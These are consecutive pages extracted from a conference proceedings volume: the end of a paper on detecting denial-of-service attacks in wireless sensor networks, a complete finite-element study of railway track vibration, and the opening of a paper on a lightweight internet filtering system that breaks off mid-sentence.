3 Approach 3.1 Problematic Wireless sensor networks introduce their share of problems: alongside severe resource constraints, there is the question of security, the implementation of which is an absolute necessity for medical or military applications, for example. While the authentication and encryption mechanisms in most computer systems use resource-intensive cryptographic protocols, the mechanisms had to be adapted to the world of sensors. But there are other aspects to security, and network availability, depending on the context, can be just as essential. In summary, the problem arises as follow: How to prevent, or failing it, how to detect and then circumvent, while saving sensor resources, a malicious action aimed at taking the network out of service. 3.2 Proposed System (LTMN Protocol) The main idea of our proposal is to guarantee effective security, while ensuring maximum network lifespan. For this, we have improved our protocol already proposed in [4]. Indeed, a monitoring functionality has been assigned to the transfer node (TN) which will be responsible for monitoring and also data transfer. It will be named Transfer and

Method of Detecting Denial of Service Attacks

13

Monitoring Node (TMN) that constitutes a Leach with Transfer and Monitoring Node protocol “LTMN protocol” (Fig. 2). Tasks of the TMN are: • If a TMN finds that a sensor violates the rules set, for example, by sending during a unit of time, more data to their CH than a determined threshold value, it retains that the node behaved unnaturally. • Each TMN that has detected a compromised node sends a warning message to its CH.

TMN

Fig. 2. Cluster managed by the transfer and monitoring node

4 Conclusion As in the public & industrial, military along with private sectors, the desire to collect and then analyze data on the environment, on processes, on flows, continues to grow. Driven by constant progress in the miniaturization of electronic components and by the design of ever more efficient batteries, made accessible by the standardization of protocols and by the use of inexpensive equipment in their manufacture, wireless sensor networks constitute the ideal technical solution to meet these needs. Security is quite a complex issue as RCSF is not only deployed on battlefields but also for surveillance, building surveillance, burglar alarms and in critical systems such as airports and hospitals. Confidentiality is required in sensor networks to protect information flowing between sensor nodes in the network or between sensors and the base station. Otherwise, it can lead to eavesdropping on the communication. Different types of threats in sensor networks are spoofing and modification of routing information, passive information collection, node subversion, sinkhole attacks, sybil attacks, denial of service attacks and interference [9, 10].

14

R. Yassine et al.

In this paper, we propose a protocol based on the classic Leach protocol and its variant the Leach-EDE protocol, in order to detect denial of service attacks while saving or evenly distributing the energy consumption of the sensors to extend the operating time of the network. In the future, the aim is to assess and develop more details concerning the role of TMNs allowing the wireless sensor network to be well secured.

References 1. Roxin, I., Bouchereau A.: Ecosystème de l’Internet des Objets. In: Bouhaï, N., Saleh, I. (dir.) Internet des objets: Evolutions et Innovations, ISTE Editions Londres, Mai 2017 2. Thebault P.: La conception à l’ère de l’Internet des Objets: modèles et principes pour le design de produits aux fonctions augmentées par des applications. thesis defended on 2013, ParisTech (2013) 3. Doumi, A.: La Sécurité des Communications dans les Réseaux de Capteurs sans Fils. Doctoral thesis. Faculty of Mathematics and Informatics Department of Informatics (2018) 4. Rayri, Y., Aroussi, H.K., Mouloudi, A.: Energy management in WSNs. In: Ezziyyani, Mostafa (ed.) AI2SD 2019. LNNS, vol. 92, pp. 127–136. Springer, Cham (2020). https://doi.org/10. 1007/978-3-030-33103-0_13 5. Clarea, L.P., Pottieb, G.J., Agrea, J.R.: Self-organizing distributed sensor networks. In: Proceedings of SPIE 3713, Unattended Ground Sensor Technologies and Applications, pp 229–237 (1999). https://doi.org/10.1117/12.357138 6. Rathod, V., Mehta, M.: Security in wireless sensor network: a survey. Ganpat Univ. J. Eng. Technol. 1(1), 35–44 (2011) 7. Butun, I., Morgera, S.D., Sankar, R.: A survey of intrusion detection systems in wireless sensor networks. IEEE Commun. Surv. Tutor. 16(1), 266–282 (2013) 8. Fu, C., Jiang, Z., Wei, W.E.I., Wei, A.: An energy balanced algorithm of LEACH protocol in WSN. IJCSI Int. J. Comput. Sci. Issues, 10(1), 354–359 (2013) 9. García-Hernández, C.F., Ibarguengoytia-Gonzalez, P.H., García-Hernández, J., Pérez-Díaz, J.A.: Wireless sensor networks and applications: a survey. IJCSNS Int. J. Comput. Sci. Netw. Secur. 7(3), 264–273 (2007) 10. Buch, D., Jinwala, D.: Denial of service attacks in wireless sensor networks. In: International Conference on Current Trends in Technology, ‘Nuicone – 2010’, pp. 1–8 (2010)

Numerical Investigation into the Vertical Dynamic Behavior of Railway Tracks Rhylane Hajar1(B) , Zougari Ayoub2 , Ben Abdellah Abdellatif2 , and Ajdour Mounia1 1 Mechanics and Civil Engineering Laboratory, Faculty of Sciences and Techniques of Tangier

(FSTT), Abdelmalek Essaadi University, Tetouan, Morocco [email protected], [email protected] 2 Laboratory of Engineering, Innovation, and Management of Industrial Systems, Faculty of Sciences and Techniques of Tangier (FSTT), Abdelmalek Essaadi University, Tetouan, Morocco

Abstract. Although the dynamic behavior of straight sections of railway tracks has been studied analytically, numerically and experimentally over the last decades by several researchers, this subject remains of current interest. In this paper, the authors have presented a more comprehensive numerical study to analyze the dynamic response of a conventional ballasted track with mono-block sleepers and three different types of non-ballastled railway tracks in the frequency domain while taking into account the actual profile of the rail. This latter has been rarely considered in previous studies, and has generally been simplified into a rectangular section or I-profile in the majority of preceding studies. The study is conducted using the finite element analysis software ANSYS, and the numerical results are compared to those obtained in a previous study to ensure their accuracy. The effect of some parameters of the Direct Fixation Fastener (DFF) track type on frequency response is also discussed; these include the fastener spacing and the stiffness of the fasteners. The results show that the frequency response of the DFF track is very sensitive to the variation of these parameters, particularly to the variation of the fastener spacing. Keywords: Railway tracks · Dynamic response · Frequency domain · Finite element analysis · Numerical results · Frequency response

1 Introduction The railway transport remains the adequate alternative for significantly unloading road transport and supporting the transport of passengers and goods between two stations due to its advantages such as large transport capacity, high speed, energy efficiency, environmental protection, as well as safety and punctuality. It presents also one of the main factors for urban city development. With the recent technical advancements and improvements of the railway transport, which allow for increased train operational speed, axle loads, and traffic density, the dynamic interactions between the train and the track have seriously aggravated, resulting in environmental issues and service performance © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 15–28, 2023. https://doi.org/10.1007/978-3-031-35251-5_3

16

R. Hajar et al.

deterioration of both vehicle components and railway track structures. The need to identify the cause of problems arising from the train-track dynamic interactions and to develop solutions to those problems has stimulated studies and researches on the train-track dynamic behavior [1]. In the literature, the dynamic behavior of straight sections of railway tracks have been widely investigated experimentally, analytically, and numerically. Experimentally, Mosayebi [2] examined the dynamic behavior of railway track sections with concrete and wooden sleepers using a field test. Using a full-scale test rig, Wang [3] investigated the dynamic performance of different types of non-ballasted track systems. Using a hammer test, Esmaeili [4] studied the dynamic behavior of a ballasted track comprising ballast mixed with tire-derived aggregate. Sysyn [5] used a field test to analyze the dynamic behavior of a ballasted railway track containing sleeper voids. Analytically, Grassie [6] studied the vertical dynamic response of a ballasted track, subjected to high frequency excitation. Knothe [7] analyzed the vertical dynamic behavior of the ballasted track, taking into account the effect of the subgrade at low frequencies. Wu [8] investigated the dynamic behavior of the ballasted track at higher frequencies while considering the rail cross sectional deformations. The influence of slab length on the vibration isolation performance of floating-slab track was investigated by Li [9]. Mazilu [10] analyzed the dynamic response of slab track with continuous slabs subjected to the moving harmonic load. The dynamic performance of the most commonly used urban railway tracks was studied by Otero [11] who found that the floating slab track is the best of all the track types considered. Numerically, Liu [12] analyzed the effect of the rail equipped with constrained damped dynamic vibration absorber on the slab track vibration reduction. Shahraki [13] studied the dynamical behavior of various types of transition zones between ballasted and non-ballasted track under the passage of highspeed trains. Zougari [14] analyzed the dynamic behavior of a ballasted track and three types of non-ballatled railway tracks. Despite the fact that the dynamic behavior of straight sections of railway lines has been widely studied in the last decades, this topic remains relevant. In the present study, the dynamic response of different ballasted and non-ballasted railway tracks is investigated numerically in the frequency domain using the finite element analysis program ANSYS Workbench (WB), module of ANSYS 19. The real profile of the rail is considered in this study, this latter has generally been simplified into a rectangular section or into I-profile in the majority of previous studies. The numerical results are then compared with those obtained in a previous study [14] to ensure their validity. The effect of some parameters of the Direct Fixation Fastener track type on the dynamic response is also examined and the findings could support the development of the non-ballasted railway track’s dynamic design by important information into the track’s fundamental dynamics in the vertical direction.

2 Numerical Study on the Railway Tracks Dynamic Response The dynamic response of railway track structures to a dynamic load is obtained numerically using the finite element analysis program ANSYS Workbench, module of ANSYS 19, by solving the general system of equations of motion of dimension N, where N is

Numerical Investigation into the Vertical Dynamic Behavior

17

the number of degrees of freedom; which is expressed as follows [15]: M u¨ n (t) + C u˙ n (t) + Kun (t) = F(t)

(1)

where M is the inertia matrix, C is the viscous damping matrix, K is the stiffness matrix, u¨ n , u˙ n , un are respectively the acceleration, velocity and displacement vectors associated with the nodal coordinates, and finally F is the time-dependent vector of external forces. In the numerical study presented here four railway track types are analyzed: the conventional ballasted track with concrete mono-block sleepers, and three types of nonballasted tracks: the Direct Fixation Fastener (DFF) track, the Bi-block track and the STEDEF track. A brief description of the studied track types is given in [15]. The different railway tracks considered are represented in ANSYS Workbench as illustrated in Figs. 1, 2, 3 and 4. The Direct Fixation Fastener (DFF) track and the Bi-block track are shown in Fig. 1 and Fig. 2, respectively. Since there is no interaction between the rails through the infrastructure, only a half-track is evaluated for both track types [14, 15]. Figure 3 and Fig. 4 display the conventional ballasted track with concrete monoblock sleepers and the STEDEF track, respectively. For both types of track, whole-track is considered to take into account the flexibility of the sleepers.

Fig. 1. The representation of the Direct Fixation Fastener (DFF) track type in ANSYS Workbench

Several ANSYS library elements are used to define the components of the various railway track types studied in this paper and it is important to mention that the frequency range considered in this research runs from 10 to 400 Hz. This range includes the characteristic frequency range of vibrations produced by wheel-rail contact [14] and it should be taken into account when selecting the type and size of the elements to use. The elements used in the description of the railway tracks considered in this paper are defined as follows: In all cases, the rails are described using straight Timoshenko beam elements BEAM188. The size of the beam element corresponds to the distance between the track supports in the reality. The real profile of the UIC54 rail is used in this numerical study, based on the profile dimensions indexed in [15]. The sketching of the actual rail profile is established using Design Modeler and then assigned to the beam elements.

18

R. Hajar et al.

Fig. 2. The representation of the Bi-block track type in ANSYS Workbench

Fig. 3. The representation of the conventional ballasted track type with concrete mono-block sleepers in ANSYS Workbench

The sleepers and the blocks, as in the case of the rails, are also described by straight Timoshenko beam elements BEAM188 and the length of the elements is chosen to enables the distributed ballast or rubber pads under blocks to be represented accurately. A rectangular profile is attributed to the beam elements describing the sleepers and the blocks. In comparison to the mass of the whole track system, the fastening system mass is negligible. Hence, the fastenings are reduced to a longitudinal massless spring element named COMBIN14. While the ballast in a ballasted track and the rubber pads under the blocks in a Bi-block and STEDEF track are described using a distribution of longitudinal

Numerical Investigation into the Vertical Dynamic Behavior

19

massless spring element COMBIN14. The lift of the sleepers over the ballast is not taken into account in the present study since the tensile supporting stiffness is not neglected. For the track components which are described using beam elements, density, Young’s modulus, and Poisson’s ratio of the material are introduced. The stiffness value is attributed to the elastic elements that represent the fastenings, the rubber pads under the blocks, and the ballast. The dissipative capacity of the railway track components is represented by a hysteresis or a structural damping, which is incorporated into ANSYS Workbench through the structural damping loss factor.

Fig. 4. The representation of the STEDEF track type in ANSYS Workbench

After defining the type of elements, the physical and the material properties of the track components, the boundary conditions should be defined adequately since it represents the most important phase in the dynamic problem definition process upon which the dynamic response of the railway track system depends directly: The railway track is composed from the superstructure and the infrastructure, in the present study only the superstructure is considered while the infrastructure supporting the track is assumed to be rigid, hence, all the nodes of the rail bottom are fixed. Only vertical excitation is considered in the study presented here and the nodal degrees of freedom in the different track types analyzed are all constrained to allow only vertical motion of the track elements and transverse bending of the beam elements. This is because the wheel-rail contact force is mainly vertical on the straight sections of a railway track, and the vertical vibrations are the most important [14]. The track length selected is sufficient to produce boundary conditions that are similar to those of an infinitely long railway track when a force is applied in the midpoint of the railway track. Dynamic problems can be solved in the time domain or the frequency domain. The aim of this paper is to characterize the dynamic response of the different railway tracks

20

R. Hajar et al.

in the frequency domain, therefore the analysis type selected is the ANSYS harmonic analysis and vertical harmonic loads with variable frequency are considered. It should be noted that in the case of hysteresis or structural damping, and always for harmonic solutions of the equation system (1), the viscous damping matrix disappears and a stiffness matrix of complex components is introduced [14]. Different methods are available in ANSYS for solving the equations representing the system. In this study, the Full method is selected. This method considers all degrees of freedom of the system and solves the general dynamic equation at any time. It’s the easiest method but also the most time-consuming; however, this is not a serious problem as the number of nodes is not very high. The results of the integration process are expressed in the frequency-domain. In the following section, the frequency responses of the various track types generated numerically in the present study are compared to those obtained in an earlier study [14, 15]. The Ansys Parametric Design Language, a module in ANSYS 13, has been employed in this earlier numerical analysis, and only a simplified rectangular profile of the rail UIC54 has been considered. The dimensions of the simplified profile have been chosen to maintain the properties of the original rail. The calculated frequency response has been compared to the experimental and analytical results and has been found to be in good agreement. The real and simplified rail profiles utilized in this paper and the previous study are illustrated in Fig. 6a and Fig. 6b, respectively.

Fig. 5. The profile of the rail UIC54. a The real profile. b The simplified profile

For instance, Fig. 5 shows the representation of the STEDEF track type in Ansys Parametric Design Language as considered in the previous study. It can be seen clearly that the rail profile considered is a rectangle.

3 Validation of the Calculation Results In an attempt to examine the accuracy and the validity of the numerical calculation results produced in this paper, the frequency response of the railway track is compared in this section with that obtained in a previous numerical analysis given in [14]. The comparison is made for the various types of railway tracks considered by mean of the

Numerical Investigation into the Vertical Dynamic Behavior

21

Fig. 6. The representation of the STEDEF track type in Ansys Parametric Design Language [14, 15]

rail vertical receptance which expresses the vertical displacement of the rail, yr , in a certain location as a function of the harmonic vertical force, F, applied at the same -or different location, for all frequency f ◦ in the range of interest. The vertical receptance of the railway track is described by the following expression [15]: R(f , x) =

yr (f , x) , F(f ) = Fej2π ft ; yr (f ) = yr ej(2π ft+ϕ) F

(2)

where yr represents the amplitude of the vertical displacement of the rail, F represents the amplitude of the vertical harmonic force applied to the rail and ϕ is the phase of the receptance. In this comparison, the harmonic exciting force is applied at the midpoint of the railway track, directly above the track support (sleeper or a fastener) and the rail vertical receptance is estimated, for all the track types considered, at the vertical excitation force point. Figures 7, 8, 9 and 10 illustrate the rail vertical receptance determined for all railway track types considered in this numerical study, as well as those available in the literature [14, 15], based on the railway track parameters presented in Tables 1, 2, 3, 4 and 5. This shows that the DFF track type has only one resonance in the frequency range studied, while two resonances are detected in the case of the traditional ballasted track with concrete mono-block sleepers, STEDEF, and Bi-block track types. The absence of sleepers in the DFF track type explains this disparity. The presence of sleepers causes the second resonance peak, which is associated with the out-of-phase vibration mode, in which the rail and sleepers vibrate in opposite directions. The first resonance is attributed to the in-phase vibration mode, in which the rail and sleepers (if present) serve as mass, while ballast in ballasted track, the rubber pads in Bi-block or STEDEF track and the fastening system in the DFF track act as a spring. Figure 7 compares the rail vertical receptance calculated in the present study and that provided in [14] for the case of the Direct Fixation Fastener (DFF) track type, properties of which are listed in Table 2. This shows that the in-phase mode occurs at the same frequency, 118 Hz, but the amplitude is slightly different.

22

R. Hajar et al. Table 1. Properties of the rail UIC54 [14] Parameter description

Value

Mass of rail per unit length

54, 4Kg/m

Density

7850Kg/m3

Modulus of elasticity

210GPa

Poisson’s ratio

0, 3

Rail cross-sectional area

6, 93.10−3 m2

Rail second moment of inertia

2, 35.10−5 m4

Loss factor of the rail

0, 02

Interactional rail gauge

1, 435m

The spacing of track supports

0, 6m

4.0E-08 Present study 3.5E-08

Literature [14]

Receptance [m/N]

3.0E-08

2.5E-08

2.0E-08

1.5E-08

1.0E-08

5.0E-09

0.0E+00 1

101

201

301

401

501

Frequency [Hz]

Fig. 7. The rail vertical receptance for the Direct Fixation Fastener (DFF) track type

Table 2. Properties of the Direct Fixation Fastener (DFF) track [14] Parameter description

Value

Stiffness of the fasteners

19, 5MN /m

Loss factor of the fasteners

0, 4

The same comparison is illustrated in Fig. 8 but for the case of Bi-block track type. The railway track properties considered are shown in Table 3. For this track type, the

Numerical Investigation into the Vertical Dynamic Behavior

23

in-phase mode occurs at the same frequency, around 59 Hz, but the amplitude is not the same. The amplitude and frequency of the out-of-phase mode found in [14] are different from those obtained in the present study. 7.0E-08 Present study

Receptance [m/N]

6.0E-08

Literature [14]

5.0E-08

4.0E-08

3.0E-08

2.0E-08

1.0E-08

0.0E+00 1

101

201

301

401

501

Frequency [Hz]

Fig. 8. The rail vertical receptance for the Bi-block track type

Table 3. Properties of the Bi-block track [14] Parameter description

Value

Rail pad stiffness

115, 2MN /m

Rail pad loss factor

0, 2

Stiffness under block

17, 58MN /m

Loss factor under block

0, 2

Mass of one concrete block

94, 8Kg

Length of one concrete block

0, 72m

Figure 9 corresponds to the same comparison in the case of the conventional ballasted track. The railway track parameters used are represented in the Table 4. The comparison shows that the in-phase mode occurs at the same frequency 42 Hz but the amplitude is not equal. The amplitude observed in [14] is slightly lower than the one reported in the present study. The frequency and amplitude of the out-of-phase mode found by the authors in [14] are higher than those produced in this paper. The comparison of rail vertical receptance generated in the case of the STEDEF track type can be seen in Fig. 10. Based on the railway track properties listed in Table 5,

24

R. Hajar et al. 8.0E-08 Present study 7.0E-08

Literature [14]

Receptance [m/N]

6.0E-08

5.0E-08

4.0E-08

3.0E-08

2.0E-08

1.0E-08

0.0E+00 1

101

201

301

401

501

Frequency [Hz]

Fig. 9. The rail vertical receptance for the conventional ballasted track type with concrete monoblock sleepers

Table 4. Properties of the conventional ballasted track with concrete mono-block sleepers [14] Parameter description

Value

Length of sleepers

2, 56m

Mass of sleepers

324Kg

Density of concrete

1759Kg/m3

Modulus of elasticity of sleepers

27, 6GPa

Poisson’s ratio of sleepers

0, 175

Sleepers cross sectional area

72.10−3 m2

Sleepers second moment of area

34, 6.10−5 m4

Loss factor of sleepers

0, 1

Rail pad stiffness

115, 2MN /m

Rail pad loss factor

0, 2

Ballast stiffness

27, 48MN /m

Loss factor of ballast

0, 2

the in-phase mode is observed at the same frequency of 58 Hz, but the amplitude is not identical. The out-of-phase mode found in [14] has a lower frequency and amplitude than the one detected in this numerical study. In fact, the differences in frequency responses calculated for the STEDEF track type are not entirely related to the use of a different rail cross section geometry. The true

Numerical Investigation into the Vertical Dynamic Behavior

25

7.0E-08 Present study

Receptance [m/N]

6.0E-08

Literature [14]

5.0E-08

4.0E-08

3.0E-08

2.0E-08

1.0E-08

0.0E+00 1

101

201

301

401

501

Frequency [Hz]

Fig. 10. The rail vertical receptance for the STEDEF track type

Table 5. Properties of STEDEF track [14] Parameter description

Value

Rail pad stiffness

115, 2MN /m

Rail pad loss factor

0, 2

Stiffness under block

17, 58MN /m

Loss factor under block

0, 2

cause of the disparities has yet to be identified, but because they are negligible for the frequency range of 0 to 600 Hz, the comparison’s result can be interpreted as a validation of the calculation results. As a result, the approach presented in this paper is reliable and could characterize the dynamic behavior of the railway in a more realistic way taking into account the real profile of the rail. This approach can be also useful to analyze many aspects of the dynamic behavior of railways, the analysis of the effect of certain parameters of the track on its dynamic behavior, for example, and the results could help in the design of a track. An example of this is presented in the next section where the authors used this approach to analyze the effect of some parameters of the non-ballasted track on its dynamic behavior.

4 The Dynamic Properties of the Non-ballasted Railway Track In this section, the Direct Fixation Fastener (DFF) track type is selected to research the dynamic properties of the non-ballasted railway tracks. By varying the fastener

26

R. Hajar et al.

spacing and the stiffness of the fasteners, the influence of the fasteners parameters on the frequency response of the DFF track is examined. Since the effect of the fastening system on the vertical track dynamics is more clearly observed on the on-support configuration, the excitation on the rail between fasteners is not simulated. The rail vertical receptance for the DFF track with different spacing and stiffness of the fasteners is calculated, as it is respectively shown in Fig. 11 and Fig. 12. 1.E-07 L = 0,3m

L = 0,6m

L = 0,8m

L = 1,2m

L = 1,5m Receptance [m/N]

1.E-08

1.E-09

1.E-10 1

101 201 301 401 501 601 701 801 901 1001 1101 1201 1301 1401 Frequency [Hz]

Fig. 11. The influence of the fasteners spacing on the frequency response of the DFF track

The impact of varying the fasteners spacing on the DFF track’s vertical receptance is shown in Fig. 11. The fasteners spacing increases, the amplitudes of vertical receptance at the first peak increase, and their frequencies decrease gradually. In the case of fastener spacing more than 0.6 m, an anti-resonance or dip related to the first pinned-pinned mode appears clearly; It is the ‘elastic sleeper support’ effect. As the fastener spacing increases, the frequency of the pinned-pinned mode decreases and the amplitude rises. This mode is the second most probable of vibration for a beam resting on equal-distance supports. At this frequency, the vertical bending wavelength equals twice the span. The first pinned-pinned mainly depends on the exciting location. It is lowest above the sleeper, causing an anti-resonance or a dip, and highest in the mid-span, generating a peak. Figure 12 illustrates the vertical receptance of the DFF track as the stiffness of the fasteners changes. This graph shows one peak, which corresponds to the in-phase mode. The amplitude becomes small and the frequency rises at the first peak because of the increasing fasteners stiffness. However, the pinned-pinned resonance doesn’t appear clearly in this calculation that the fasteners spacing keep unaltered and equal to 0.6 m. These results could aid in the design of a non-ballasted railway track and the selection of a fastener type to be used and thus to improve the railway tracks’ dynamic behavior.

Numerical Investigation into the Vertical Dynamic Behavior

27

1.E-07 k = 4875000 N/m k = 9750000 N/m k = 19500000 N/m k = 29250000 N/m k = 58500000 N/m

Receptance [m/N]

1.E-08

1.E-09

1.E-10 1

101 201 301 401 501 601 701 801 901 1001 1101 1201 1301 1401 Frequency [Hz]

Fig. 12. The influence of the fasteners stiffness on the frequency response of the DFF track

5 Conclusion A detailed numerical study on the frequency response of a traditional ballasted railway track with concrete mono-block sleepers and three types of non-ballasted tracks has been presented in this paper. The study is carried out with ANSYS Workbench, a finite element program included with ANSYS 19 and takes into account the actual rail profile. This latter has been generally simplified into a rectangular profile or into I-profile in the most of previous studies. The comparison of the numerical results obtained in this study with those generated before reveals a good agreement in the frequency range considered. The results used in the comparison have been generated in a previous work using the Ansys Parametric Design Language, module of ANSYS 13 and have been validated by comparing them to experimental measurements and analytical results. The effect of varying some of the fasteners parameters on the frequency response of a non-ballastled track has been also discussed in the present paper; these include the fastener spacing and the stiffness of the fasteners. It’s shown that the fasteners spacing and stiffness have a major impact on the frequency response of the non-ballasted track. The effect of fasteners characteristics on the DFF track dynamic response is demonstrated by these results. • The fasteners spacing gets larger, the amplitudes of the in-phase mode increase and its frequency decrease slightly. • The pinned-pinned mode appears clearly in the case of fasteners spacing more than 0.6 m, its frequency drops and its amplitude rises as the fasteners spacing becomes large. Thus, the fasteners spacing affects the vertical response of the non-ballasted tracks when it is larger than about 0.6 m. • The amplitude of the in-phase mode becomes small and its frequency rises because of the increasing the fasteners stiffness.

28

R. Hajar et al.

In the future, this numerical study will be extended to account for the complex geometry of a curved section of a railway track in order to investigate the dynamic behavior of curved railway tracks.

References 1. Zhai, W.: Vehicle-Track Coupled Dynamics: Theory and Applications. Springer, Singapore (2020) 2. Mosayebi, S.-A., Zakeri, J.-A., Esmaeili, M.: Field test investigation and numerical analysis of ballasted track under moving locomotive. J. Mech. Sci. Technol. 30(3), 1065–1069 (2016). https://doi.org/10.1007/s12206-016-0209-3 3. Wang, M., Cai, C., Zhu, S., Zhai, W.: Experimental study on dynamic performance of typical nonballasted track systems using a full-scale test rig. Proc. Inst. Mech. Eng. Part F: J. Rail Rapid Transit. 231, 470–481 (2017). https://doi.org/10.1177/0954409716634751 4. Esmaeili, M., Ebrahimi, H., Sameni, M.K.: Experimental and numerical investigation of the dynamic behavior of ballasted track containing ballast mixed with TDA. Proc. Inst. Mech. Eng. Part F: J. Rail Rapid Transit. 232, 297–314 (2018). https://doi.org/10.1177/095440971 6664937 5. Sysyn, M., Nabochenko, O., Kovalchuk, V.: Experimental investigation of the dynamic behavior of railway track with sleeper voids. Railw. Eng. Sci. 28(3), 290–304 (2020). https://doi. org/10.1007/s40534-020-00217-8 6. Grassie, S.L., Gregory, R.W., Harrison, D., Johnson, K.L.: The dynamic response of railway track to high frequency vertical excitation. J. Mech. Eng. Sci. 24, 77–90 (1982). https://doi. org/10.1243/JMES_JOUR_1982_024_016_02 7. Knothe, K., Wu, Y.: Receptance behaviour of railway track and subgrade. Arch. Appl. Mech. (Ingenieur Archiv). 68, 457–470 (1998). https://doi.org/10.1007/s004190050179 8. Wu, T.X., Thompson, D.J.: A double Timoshenko beam model for vertical vibration analysis of railway track at high frequencies. J. Sound Vib. 224, 329–348 (1999). https://doi.org/10. 1006/jsvi.1999.2171 9. Li, Z.G., Wu, T.X.: Modelling and analysis of force transmission in floating-slab track for railways. Proc. Inst. Mech. Eng. Part F: J. Rail Rapid Transit. 222, 45–57 (2008). https://doi. org/10.1243/09544097JRRT145 10. Mazilu, T.: Predicting the dynamic response of slab track with continuous slabs under moving load. Présenté à 11th International Conference on Sustainability in Science Engineering, WSEAS Transactions, Timisoara, Romania (2009) 11. Otero, J., Martínez, J., de los Santos, M.A., Cardona, S.: A mathematical model to study railway track dynamics for the prediction of vibration levels generated by rail vehicles. Proc. Inst. Mech. Eng. Part F: J. Rail Rapid Transit. 226, 62–71 (2012). https://doi.org/10.1177/095 4409711406837 12. Liu, L., Shao, W.: Design and dynamic response analysis of rail with constrained damped dynamic vibration absorber. Procedia Eng. 15, 4983–4987 (2011). https://doi.org/10.1016/j. proeng.2011.08.926 13. Shahraki, M., Warnakulasooriya, C., Witt, K.J.: Numerical study of transition zone between ballasted and ballastless railway track. Transp. Geotechnics. 3, 58–67 (2015). https://doi.org/ 10.1016/j.trgeo.2015.05.001 14. Zougari, A., Martínez, J., Cardona, S.: Numerical models of railway tracks for obtaining frequency response Comparison with analytical results and experimental measurements. ISSN. 18, 11 (2016) 15. Zougari, A.: Estudio del comportamiento vibratorio de vías ferroviarias mediante simulación numérica (2018)

A Lightweight, Multi-layered Internet Filtering System Ali Sadiqui(B) and Filali Moulay Rachid CF Meknes, OFPPT Laboratoire, Meknes, Morocco [email protected]

Abstract. The Internet has become an indispensable tool for everyone. Among other things, it serves as an encyclopedia at your fingertips and without limits of time and place. However, it is also a ruthless universe that has the potential to become a real threat to the most vulnerable of humanity. Hence the demand for filtering from parents, education managers and small entrepreneurs, anxious to protect their users from the multiple sources of distraction to which the web lends itself well. Although several Internet filtering tools are available on the market, their deployments and configurations require fairly in-depth knowledge of the field, which most often makes their integration complicated or even inefficient. In this article, we will outline an experiment we have conducted in this area, which proposes solutions to overcome the problems that may be due to the absence or ineffectiveness of filtering. Indeed, we have been able to develop an efficient and easy-to-handle Internet filtering system. This system is able to provide both protection and monitoring of usage time during deployment, whether at home, in educational settings, or on restricted networks. Keywords: Lightweight firewall · Internet filtering · Web filtering · Wi-Fi filtering · Parental controls

1 Introduction Internet filtering means any technique for blocking or limiting access to content disseminated on the Internet that is considered inappropriate or unnecessary. With this in mind, we define the lightweight filtering system as any system that can perform the aforementioned task to an audience whose computer knowledge is quite limited. Unlike large structures where the presence of firewalls is a necessity and whose configuration is entrusted to professionals specialized in this field, a lightweight Internet filtering system remains an ideal protection intermediary in other contexts of lesser importance. Indeed, this type of system includes tools that can be used in various environments and for various purposes namely, parental control and limiting access to certain sites that do not relate to professional activity. And this is also the case concerning the control carried out by schools or universities to prohibit access to sensitive sites deemed undesirable or inappropriate, etc. (see Table 1). © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 29–39, 2023. https://doi.org/10.1007/978-3-031-35251-5_4

30

A. Sadiqui and F. M. Rachid

To meet the above objectives, we have worked on the development and deployment of ad hoc lightweight Internet filtering equipment to secure and manage networks intended for a variety of audiences. Said equipment applies Internet filtering techniques automatically and transparently to exempt the user from any intervention. Access to any of its configuration or filtering features is via a web interface or a mobile application for ease of use. Table 1. Example of environments that can integrate a lightweight web filtering system. Scope of application

Example of a target population

Some expected goals of web filtering

Home Wi-Fi network

Families concerned about parental control

Ban adult sites Create a time limit to one to several activities on the Internet Protect the home network from dangers emanating from the Internet

Network in educational spaces

Schools, universities, educational associations, libraries etc.

Network of SMEs that do not have the financial and human resources to deploy a dedicated firewall

Fiduciaries, travel agencies, design offices, insurance, etc.

Create a whitelist and/or blacklist of sites, services or applications accessible on the Internet

Network in entertainment spaces

Cafes, restaurants, playgrounds, swimming pools; etc.

Service Provider Networks

Internet providers

Having the will to ensure this functionality to their customers in their Internet connection equipment

Industrial Networks

IoT Access control, surveillance cameras, industrial machines, etc

Enable or disable the internet on the object Enable or disable a service, protocol, port, etc.

In this document, we will begin by briefly presenting the different methods of internet filtering and the justification of the choice we have made in relation to our problem in order to better situate our remarks. In the second part, we will develop the solution adopted and we will dwell on some characteristics of the system that we had proposed before concluding.

A Lightweight, Multi-layered Internet Filtering System

31

2 Internet Filtering Methods A firewall is a, hardware or software, security network element that controls inbound and outbound traffic according to a set of predefined rules. It is a real barrier between a trusted network and other networks considered less reliable. Different types of firewalls incorporate software, hardware, or a combination of both. We distinguish several types of firewalls namely state firewalls, NAT firewalls, proxy firewalls, dynamic inspection firewalls among others. All of them have different uses, strengths and weaknesses. To ensure internet filtering, firewall must choose a well-defined blocking method. In the following we will introduce different methods of Internet filtering most often used: • DNS server-based filtering: This prevents access to domains that do not correspond to pre-established rules. This process is quite simple to implement because it is enough to modify the preconfigured DNS settings, usually by the internet provider, by an IP address fixed on one of the DNS servers, free or paid, intended for this task. However, this process has workarounds when a user with process knowledge manually configures their DNS or configures a VPN tunnel. • Filtering based on network protocols: It prevents access to certain services or sites according to the destination IP address, the output port or the protocol used. This process is effective in some cases. However, it requires knowing all the IP addresses of the servers or the ports used by certain services to succeed. In addition, blocking certain IPs, protocols or ports may bring about the blocking of other unwanted services. • Client-side filtering: This type of filter is deployed as a software on each element where filtering is required. This technique is effective in some cases, especially in home networks as a parental control tool because it allows offering more features and flexibility to parents since it allows them to control even games or software that do not require access to the Internet. However, it has the following disadvantages: • It is confronted with the resistance of children at certain ages, which is a source of inconvenience to parents. • It is reluctant on the part of users due to fears related to security risks because installing third-party software on the target device increases the risk of intrusion that may occur following possible security vulnerabilities of the software. • It can be very expensive when the number of equipment to be checked is very high. • It is difficult to be applied in other environments where the need for web filtering is required, like in education spaces, libraries, universities, etc. • Search engine filtering: Also called “SafeSearch”. It is a web filtering that uses a preconfigured search engine to exclude during a search on the web, results deemed inappropriate for certain ages or audiences. Several search engines such as Google, Bing, or Duck Duck Go allow you to use this option, and this, by indicating an IP address of a server where search queries should be redirected. It also should be noted that web browsers integrate this option and can automatically redirect search queries to said servers, when this option is activated, which

32

A. Sadiqui and F. M. Rachid

